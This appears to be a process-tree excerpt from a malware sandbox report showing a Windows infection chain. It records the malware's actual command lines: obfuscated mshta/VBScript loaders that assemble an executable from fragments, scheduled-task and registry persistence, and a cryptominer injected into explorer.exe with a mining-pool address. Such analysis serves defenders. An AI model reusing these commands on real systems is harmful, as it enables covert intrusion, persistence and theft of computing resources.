C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 6089⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e4,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,3294298163946305644,4700786474681246703,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8048_1663557492" --mojo-platform-channel-handle=1732 /prefetch:811⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6372 -s 22449⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\adF6KxjhcOfjYh4ost48IawU.exe"3⤵
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\6F64.exeC:\Users\Admin\AppData\Local\Temp\6F64.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\6F64.exeC:\Users\Admin\AppData\Local\Temp\6F64.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ABB3.exeC:\Users\Admin\AppData\Local\Temp\ABB3.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\ED03.exeC:\Users\Admin\AppData\Local\Temp\ED03.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX4\mannishly.bat" "3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\bifurcation.exebifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\beadroll.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\beadroll.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 19446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\FFEF.exeC:\Users\Admin\AppData\Local\Temp\FFEF.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 2363⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\16A5.exeC:\Users\Admin\AppData\Local\Temp\16A5.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 3963⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\2DA8.exeC:\Users\Admin\AppData\Local\Temp\2DA8.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2803⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4112.exeC:\Users\Admin\AppData\Local\Temp\4112.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\4112.exeC:\Users\Admin\AppData\Local\Temp\4112.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\5D56.exeC:\Users\Admin\AppData\Local\Temp\5D56.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5D56.exeC:\Users\Admin\AppData\Local\Temp\5D56.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 2084⤵
- Enumerates connected drives
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\71F8.exeC:\Users\Admin\AppData\Local\Temp\71F8.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\7A55.dll2⤵
-
C:\Users\Admin\AppData\Local\Temp\DF69.exeC:\Users\Admin\AppData\Local\Temp\DF69.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 15284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Ent5pjl6\configbdzhzl.exe"C:\Program Files (x86)\Ent5pjl6\configbdzhzl.exe"2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""2⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\New Microsoft Word Document.docx" /o ""2⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\New Microsoft PowerPoint Presentation.pptx" /ou ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17870faab0.exeMon17870faab0.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 19802⤵
- Program crash
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe" ) do taskkill -im "%~NxK" -F2⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "6⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "9XMk2MZ_hrB_trxtCmDErnDv.exe" -F3⤵
- Kills process with taskkill
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 4523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 4523⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1240 -ip 12401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 132 -p 4040 -ip 40401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 5544 -ip 55441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5672 -ip 56721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 932 -ip 9321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3160 -ip 31601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1460 -ip 14601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 6372 -ip 63721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 4563⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4856 -ip 48561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5592 -ip 55921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5148 -ip 51481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3412 -ip 34121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6032 -ip 60321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5708 -ip 57081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5688 -ip 56881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5788 -ip 57881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5828 -ip 58281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 400 -ip 4001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5980 -ip 59801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1816 -ip 18161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5592 -ip 55921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5656 -ip 56561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4680 -ip 46801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 4203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6552 -ip 65521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1180 -ip 11801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2664 -ip 26641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2440 -ip 24401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 7084 -ip 70841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5768 -ip 57681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5968 -ip 59681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 236 -ip 2361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6192 -ip 61921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5012 -ip 50121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6964 -ip 69641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4048 -ip 40481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 17AC13288A7D16CE214FD3E68B81D758 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CC0EF3B12C0C1BEA05217AD842BA54552⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B84794564B661AB9FB1D43794C5250D5 E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 4483⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6152 -ip 61521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 10092 -ip 100921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6264 -ip 62641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
